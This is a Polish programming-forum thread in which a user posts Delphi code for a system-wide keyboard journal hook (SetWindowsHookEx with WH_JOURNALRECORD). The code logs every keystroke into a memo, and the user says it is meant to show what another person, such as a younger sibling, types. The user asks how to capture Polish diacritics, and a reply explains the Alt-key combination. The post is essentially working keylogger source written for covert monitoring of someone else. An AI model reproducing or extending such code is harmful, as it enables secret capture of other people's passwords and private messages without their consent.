SetWindowsHookEx + polskie znaki

0

Mam problem napisałem aplikację która ma mi pokazyważ jakie klawisze wciska np młodsze rodzeństwo, wszystko działa wporządku z tym że program nie rejestruje mi polskich znaków

var 
  Form1: TForm1; 
  Hook : Integer; 
  MessageBuffer : TEventMsg; 

function Play(Code: integer; wParam, lParam: Longint): Longint; stdcall; 
begin 
case Code of 
HC_ACTION: begin 
MessageBuffer:=PEventMsg(lParam)^; 
if MessageBuffer.message=wm_KeyDown then begin 
Form1.Memo1.Text:=Form1.Memo1.Text+chr(MessageBuffer.paraml); 
Result:=0; 
end; 
end; 
else begin 
Result := CallNextHookEx(Hook, Code, wParam, lParam); 
end; 
end; 
end; 

procedure TForm1.FormCreate(Sender: TObject); 
begin 
Hook:=SetWindowsHookEx(wh_journalrecord,play,HInstance,0); 

end; 

procedure TForm1.FormDestroy(Sender: TObject); 
begin 
UnHookWindowsHookEx(Hook); 
end; 

czy ktoś życzliwy mógłby mi wyjaśnić co trzeba zrobić aby polskie znaki również program wczytywał ?

0

Pamiętaj, że polskie znaki to (standardowo) wciśnięcie jednego klawisza (na 'A') przy wciśniętym innym (np.: ALT).. czyli 2 klawisze, a nie jeden.. i to nie przypadkowe dwa.. po prostu sprawdzaja stan klawisza alt..

1 użytkowników online, w tym zalogowanych: 0, gości: 1